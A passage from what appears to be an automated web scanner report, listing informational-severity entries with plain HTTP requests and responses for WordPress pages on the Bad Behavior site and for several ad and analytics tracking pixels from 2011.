Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:13 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761873+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 5892

<?xml version="1.0" encoding="UTF-8"?><rss version="0.92">
<channel>
   <title>Bad Behavior / Bad Behaviour</title>
   <link>http://bad-behavior.ioerror.us</link>
   <description>The Web&#039;s premier link
...[SNIP]...

7.216. http://bad-behavior.ioerror.us/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /index.php

Request

GET /index.php HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:16:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762170+173.193.214.243; path=/
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Location: http://bad-behavior.ioerror.us/
Content-Length: 0


7.217. http://bad-behavior.ioerror.us/srv/www/ioerror.us/wp-content/plugins/word-press-flow-player/flowplayer/flowplayer-3.1.4.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /srv/www/ioerror.us/wp-content/plugins/word-press-flow-player/flowplayer/flowplayer-3.1.4.min.js

Request

GET /srv/www/ioerror.us/wp-content/plugins/word-press-flow-player/flowplayer/flowplayer-3.1.4.min.js HTTP/1.1
Host: bad-behavior.ioerror.us
Proxy-Connection: keep-alive
Referer: http://bad-behavior.ioerror.us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bb2_screener_=1298752931+173.193.214.243

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 20:42:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298752932+173.193.214.243; path=/
Vary: Accept-Encoding, Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 26 Feb 2011 20:42:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.218. http://bad-behavior.ioerror.us/trackback/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /trackback/

Request

GET /trackback/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762151+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 26 Feb 2011 23:15:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.219. http://bad-behavior.ioerror.us/wp-content/themes/unnamed-one-10-stable/js/livesearch.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /wp-content/themes/unnamed-one-10-stable/js/livesearch.js.php

Request

GET /wp-content/themes/unnamed-one-10-stable/js/livesearch.js.php HTTP/1.1
Host: bad-behavior.ioerror.us
Proxy-Connection: keep-alive
Referer: http://bad-behavior.ioerror.us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 20:42:11 GMT
Content-Type: text/javascript; charset: UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298752931+173.193.214.243; path=/
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Cache-Control: public
Pragma: cache
Expires: Wed, 27 Apr 2011 20:42:11 GMT
Last-Modified: Tue, 11 Jan 2011 12:45:47 GMT
Vary: Accept-Encoding
Content-Length: 3041

Livesearch = Class.create();

Livesearch.prototype = {
   initialize: function(father, url, pars, attachitem, contentitem, loaditem, resetitem, searchtext) {
       this.father = father;
       this.attachit
...[SNIP]...

7.220. http://bad-behavior.ioerror.us/wp-content/themes/unnamed-one-10-stable/livesearch.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /wp-content/themes/unnamed-one-10-stable/livesearch.php

Request

GET /wp-content/themes/unnamed-one-10-stable/livesearch.php HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761872+173.193.214.243; path=/
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 26 Feb 2011 23:11:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 0


7.221. http://bad-behavior.ioerror.us/wp-content/themes/unnamed-one-10-stable/unnamed-css.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /wp-content/themes/unnamed-one-10-stable/unnamed-css.php

Request

GET /wp-content/themes/unnamed-one-10-stable/unnamed-css.php HTTP/1.1
Host: bad-behavior.ioerror.us
Proxy-Connection: keep-alive
Referer: http://bad-behavior.ioerror.us/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 20:42:11 GMT
Content-Type: text/css; charset: UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298752931+173.193.214.243; path=/
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 26 Feb 2011 20:42:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 10747

/* General */
* {
padding:0;
margin:0;
}

body {
font-size:12px;
font-family:Verdana,Tahoma,Arial,sans-serif;
color:#333;
line-height:140%;
text-align:left;
background:#ddd;
}

fieldset
...[SNIP]...

7.222. http://bad-behavior.ioerror.us/wp-login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /wp-login.php

Request

GET /wp-login.php HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762151+173.193.214.243; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 26 Feb 2011 23:15:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.ioerror.us
Content-Length: 2466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   <ti
...[SNIP]...

7.223. http://bad-behavior.ioerror.us/xmlrpc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /xmlrpc.php

Request

GET /xmlrpc.php HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:18 GMT
Content-Type: text/plain
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761878+173.193.214.243; path=/
Content-Length: 42

XML-RPC server accepts POST requests only.

7.224. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Request

GET /bh/set.aspx?action=add&advid=2837&token=RCQU9 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=242|1|-8589027083575281352|1; C2W4=32S9hCcGYz3BhCx-4Dmhssu7xP3L1BddvcBxlQ4MHTj3TZsY_EbKppw; cwbh1=749%3B03%2F07%2F2011%3BDOTM6%0A1485%3B03%2F19%2F2011%3BCMST1%0A2996%3B03%2F22%2F2011%3BLOW21%0A2837%3B03%2F23%2F2011%3BRCQU1%0A357%3B03%2F25%2F2011%3BEMON1%0A2532%3B03%2F28%2F2011%3BAMQU1; V=GlchrMbA1MSR

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Set-Cookie: V=GlchrMbA1MSR; Domain=.contextweb.com; Expires=Wed, 22-Feb-2012 02:20:09 GMT; Path=/
Set-Cookie: cwbh1=749%3B03%2F07%2F2011%3BDOTM6%0A1485%3B03%2F19%2F2011%3BCMST1%0A2996%3B03%2F22%2F2011%3BLOW21%0A2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%0A2532%3B03%2F28%2F2011%3BAMQU1; Domain=.contextweb.com; Expires=Mon, 01-Feb-2016 02:20:09 GMT; Path=/
Content-Type: image/gif
Date: Sun, 27 Feb 2011 02:20:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

7.225. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773835603&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838229/0/6/AdId=1468660;BnId=1;itime=773835603;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311151;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=; A3=heSmakII0c9M00001hK5JalZa0bfZ00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000001tq8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Fri, 27-May-2011 21:30:37 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=heSmakII0c9M00001hK5JalZa0bfZ00002hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000002tq8qaI0000000001tn; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:30:36 GMT
Connection: close
Content-Length: 2191

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

7.226. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Request

GET /click/bstats.gif?kid=45552255&bapid=6074&uid=755931 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362171x0.807+1297860041x-1198401335; rb="0:684339:20838240:4d5b2371-3928-7a83-24fb-d52328f5624b:0:712181:20838240::0:742697:20828160:8392341830659049202:0"; ut=1%3ANcxNCoAgEEDhu8zahVZUdBszS4vUJijS6e790fbx8RJsGTQJJn3sHrsVGlDG1MPCTSAxb4VZSBBnf%2FQknIwlvhELpfpHtThTTlU%2Ffi5Eq29XR24fBwxa6ZxG%2B%2F7hPC8%3D; vsd="0@1@4d69b473@load.exelator.com"; srh=1%3Aq64FAA%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: ut=1%3ANc1BCoAgEEDRu8zahYZEeBszTam0jIxsuntltH18%2BCekCsQJgz72ELsVBChrm36hdkY2JW4XZEjJjwGZl7mOBSNXyhSQATma7Ri%2FcM5OP95k6t4QCLTSex1dGcB13Q%3D%3D; Domain=.adbrite.com; Expires=Wed, 24-Feb-2021 02:20:48 GMT; Path=/
Set-Cookie: vsd="0@1@4d69b500@www.project-syndicate.org"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Type: image/gif
Content-Length: 42
Date: Sun, 27 Feb 2011 02:20:47 GMT
Connection: close

GIF89a.............!.......,........@..D.;

7.227. http://capgeminicom.112.2o7.net/b/ss/capgeminicom/0/FAS-1.3/s98757477793842  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicom.112.2o7.net
Path:   /b/ss/capgeminicom/0/FAS-1.3/s98757477793842

Request

GET /b/ss/capgeminicom/0/FAS-1.3/s98757477793842?[AQB]&ndh=1&t=28%2F1%2F2011%2011%3A50%3A18%201%20360&ce=UTF%2D8&g=http%3A%2F%2Fwww%2Ecapgemini%2Ecom%2F&cc=EUR&v1=The%20eGovernment%20Benchmark%20Report%202010%20%7C%20http%3A%2F%2Fwww%2Ecapgemini%2Ecom%2F&s=1920x1200&[AEQ]? HTTP/1.1
Host: capgeminicom.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/ext/video_library/swf/player_onsite.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:50:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:50:24 GMT
Last-Modified: Tue, 01 Mar 2011 17:50:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE060-3917-59017F93"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www216
Content-Length: 1
Content-Type: text/html


7.228. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s91173577997833  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s91173577997833

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s91173577997833?AQB=1&ndh=1&t=28/1/2011%2011%3A56%3A9%201%20360&pageName=About%20Us&g=http%3A//www.capgemini.com/about/&r=http%3A//www.capgemini.com/services-and-solutions/technology/&ch=About%20Us&c1=About%20Us&h1=Home%7CAbout%20Us&v2=/about/&h2=Home%7CAbout%20Us&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/about/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:56:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:56:06 GMT
Last-Modified: Tue, 01 Mar 2011 17:56:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE1B6-27B0-56AFAF34"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www38
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.229. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92401193352416  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92401193352416

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92401193352416?AQB=1&ndh=1&t=28/1/2011%2011%3A51%3A33%201%20360&pageName=News%20%26%20Events&g=http%3A//www.capgemini.com/news-and-events/&r=http%3A//www.capgemini.com/&ch=News%20%26%20Events&c1=News%20%26%20Events&h1=Home%7CNews%20%26%20Events&v2=/news-and-events/&h2=Home%7CNews%20%26%20Events&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/news-and-events/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; 